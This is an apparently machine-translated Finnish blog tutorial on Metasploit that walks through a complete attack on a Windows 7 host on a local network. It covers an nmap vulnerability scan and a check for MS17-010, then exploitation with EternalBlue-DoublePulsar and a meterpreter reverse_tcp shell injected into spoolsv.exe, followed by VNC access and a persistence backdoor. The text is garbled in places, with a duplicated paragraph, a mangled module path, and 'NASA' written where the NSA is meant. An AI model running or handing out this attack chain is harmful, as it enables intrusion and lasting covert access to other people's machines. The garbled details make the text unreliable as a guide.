Koska olemme keskustelleet TOP 25 PARASTA KALI LINUX-TYÖKALUA, ja laitoimme METASPLOITin ensimmäiseksi luettelossa, nyt keskustellaan ja opitaan METASPLOITista. Suosittelemme, että tunnet Metasploitin.

Metasploitin loi alun perin H. D Moore vuonna 2003, kunnes Rapid7 osti sen ja kehitti sitä edelleen 21. lokakuuta 2009. Metasploit-framework on kirjoitettu kokonaan Rubya käyttäen, ja se on vakiopaketti, joka on asennettu Kali Linux -järjestelmään (ja kai myös lähes kaikkiin Penetration Testing -käyttöjärjestelmiin). Se on hakkereiden tai penetraatiotestaajien suosikkipaketti tietoturva-aukkojen tutkimiseen, hyväksikäyttökohteiden kehittämiseen ja suorittamiseen kohteisiin sekä muuhun tietoturvakehitykseen.

Metasploitista on useita versioita, jotka jaetaan yleensä kahteen kategoriaan, ilmaiseen ja maksulliseen versioon. Ilmaiset versiot: Metasploit Framework Community Edition (CLI-pohjainen käyttöliittymä) ja Armitage (GUI-pohjainen käyttöliittymä). Maksulliset versiot : Metasploit Express, Metasploit Pro ja Cobalt Strike (muistuttaa Armitagea, jonka tarjoaa Strategic Cyber LLC).

Metasploit antaa käyttäjille mahdollisuuden luoda (tai kehittää) omaa hyväksikäyttökoodia, mutta älä huoli, jos et osaa koodata, Metasploitissa on niin paljon moduuleja ja niitä päivitetään jatkuvasti. Tällä hetkellä Metasploitissa on yli 1600 riistoa ja 500 hyötykuormaa. Helppo tapa ymmärtää, mitä ovat exploitit ja hyötykuormat, exploit on periaatteessa se, miten hyökkääjä toimittaa hyötykuorman kohdejärjestelmän haavoittuvuusaukon kautta. Kun hyökkääjä käynnistää hyötykuorman sisältävän hyökkäyksen haavoittuvaa kohdetta vastaan, hyötykuorma otetaan käyttöön (hyötykuormaa käytetään yhteyden muodostamiseen takaisin hyökkääjään etäyhteyden saamiseksi kohdejärjestelmään), tässä vaiheessa hyötykuorma on valmis, ja siitä tulee merkityksetön.

”Metasploit ei ole hakkeroinnin pikatyökalu, se on mieletön kehys”

Tämä Metasploit-artikkeli käsittelee tunkeutumistestauksen suorittamista kohdejärjestelmää vastaan seuraavalla virtauksella:

  • Haavoittuvuuksien skannaus
  • Haavoittuvuuksien arviointi
  • Hyökkäys
  • Etäkäyttöoikeuden saaminen – järjestelmän omistaminen

VALMISTELU

Varmista, että Kali Linuxissamme on uusin päivitetty versio. Jokaisessa päivityksessä on parannuksia. Suorita seuraavat komennot:

~# apt update
~# apt upgrade -y
~# apt dist-upgrade -y

Jos koneemme on ajan tasalla, aloitetaan nyt käynnistämällä metasploit-konsoli. Kirjoita terminaaliin:

~# msfconsole

Ja lisäksi tarvitset minkä tahansa tekstieditorin, Geditin tai Leafpadin, kerätäksesi joitain tietoja matkan varrella ennen kuin käännämme hyökkäyksen. Ensin tunnistetaan langattoman liitännän IP-osoite, reitittimen IP-osoite ja verkkomassa.

Ylläolevien tietojen perusteella merkitään WLAN1:n ja reitittimen IP-osoite sekä verkkomassa. Muistiinpanon tulisi siis näyttää seuraavalta:

Hyökkääjän IP (LHOST): 192.168.1.56
Gatewayn / reitittimen IP: 192.168.1.1
Netmask:

VAIHE 1 : HAAVOITETTAVUUDEN TUTKIMINEN

Metasploit-konsolissa keräämme sitten ensin tietoja, kuten kohteen IP-osoitteen, käyttöjärjestelmän, avatut portit ja haavoittuvuuden. Metasploitin avulla voimme ajaa NMapin suoraan konsolista. Yllä olevien tietojen perusteella suoritamme tämän komennon suorittaaksemme tiedonkeruutehtävämme.

msf > nmap -v 192.168.1.1/24 --script vuln -Pn -O

Yllä olevasta komennosta saimme alla olevan tuloksen.

Saimme haavoittuvan kohteen, jossa on Windows-käyttöjärjestelmä, ja haavoittuvuus on SMBv1-palvelussa. Lisää siis huomautus.

Kohteen IP (RHOST): 192.168.1.57
Haavoittuvuus: (ms17-010)

VAIHE 2 : HAAVOITETTAVUUDEN ARVIOINTI

Nyt tiedämme kohteen ja sen haavoittuvuuden. Tarkistetaan haavoittuvuus metasploit-konsolissa

Nyt tiedämme kohteen ja sen haavoittuvuuden. Tarkistetaan haavoittuvuus metasploit-konsolissa käyttämällä smb_scanner-apumoduulia. Suorita seuraava komento:

msf > use auxiliary/scanner/smb/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > set RHOSTS
msf auxiliary(smb_ms17_010) > run

Metasploit luottaa haavoittuvuuteen ja näyttää tarkan Windows-käyttöjärjestelmäversion. Lisää huomautus:

Target OS: Windows 7 Ultimate 7600

VAIHE 3 : HYÖDYNTÄMINEN

Epäonnekseen metasploitilla ei ole tähän haavoittuvuuteen liittyvää exploit-moduulia. Mutta, älä huoli, on kaveri ulkopuolella alttiina ja kirjoitti exploit-koodin. Hyödyntäminen on tuttua, koska se on NASA:n aloittama se on nimeltään EternalBlue-DoublePulsar. Voit napata sen täältä, tai voit seurata alla olevan tutorial-videon opasta asentaaksesi exploit-koodin metasploit-kehykseen.

Kun olet seurannut edellä olevaa opasta pitkin, (varmista, että polku on sama kuin tutorialissa). Nyt olet valmis hyödyntämään kohdetta. Suorita seuraavat komennot:

use exploit/windows/smb/eternalblue_doublepulsar
set payload windows/meterpreter/reverse_tcp
set PROCESSINJECT spoolsv.exe
set RHOST 192.168.1.57
set LHOST 192.168.1.56

Exploit

Boom… Exploit onnistui, saimme meterpreter-istunnon. Kuten aiemmin mainitsin, kun exploit on käynnistetty, se asentaa hyötykuorman, joka on, tässä käytimme, windows/meterpreter/reverse_tcp.

VAIHE 4 : KAUKO-OSOITUKSEN SAAMINEN

Tutustutaan lisää käytettävissä oleviin komentoihin, kirjoita ’?’ (ilman kysymysmerkkiä) ja katso luetellut käytettävissä olevat komennot. Stdapi, järjestelmäkomennot ovat:

Käyttääksesi lisätietoja kohdejärjestelmästä, käytä komentoa ’sysinfo’. Tulosteen pitäisi näyttää tältä.

Koska pistimme aiemmin järjestelmäprosessiin (spoolsv.exe), saimme järjestelmäoikeudet. Omistamme kohteen. Voimme tehdä paljon komennolla kohteeseen. Voimme esimerkiksi suorittaa RDP:n tai vain asettaa VNC:n etäyhteyden. Käyttääksemme VNC-palvelua anna komento:

~# run vnc

Tuloksena pitäisi olla kohdekoneen työpöytä, se näyttää tältä.

Tärkein osa on luoda takaportti, joten aina kun kohdekone katkaisee yhteyden meidän koneeseemme, kohdekone yrittää muodostaa yhteyden takaisin, taas meihin. Takaporttia käytetään pääsyn ylläpitämiseen, se on kuin kalastus, et heitä kalaa takaisin veteen, kun olet saanut kalan, eikö? Haluat tehdä jotain kalalle, joko tallentaa sen jääkaappiin myöhempiä toimia varten, kuten ruoanlaittoa varten tai myydä sen rahaksi.

Meterpreterillä on tämä jatkuva backdooring-toiminto. Suorita seuraava komento ja katso käytettävissä olevat parametrit ja argumentit.

meterpreter > run persistence -h

Jos tämä vanhentunut skripti ei miellytä sinua, uusin persistence-moduuli on osoitteessa post/windows/manage/persistence_exe. Voit tutkia sitä tarkemmin itse.

Metasploit on valtava,se ei ole vain työkalu,se on kehys,ota huomioon että siinä on yli 1600 exploitia ja noin 500 hyötykuormaa. Yksi artikkeli sopii vain isoon kuvaan yleisestä käytöstä tai ideasta. Mutta, olet oppinut niin paljon tästä artikkelista.

”Mitä enemmän seuraat hyökkäyksen kulkua, sitä enemmän sinulla on vaivatonta haastetta.”

Vastaa

Sähköpostiosoitettasi ei julkaista.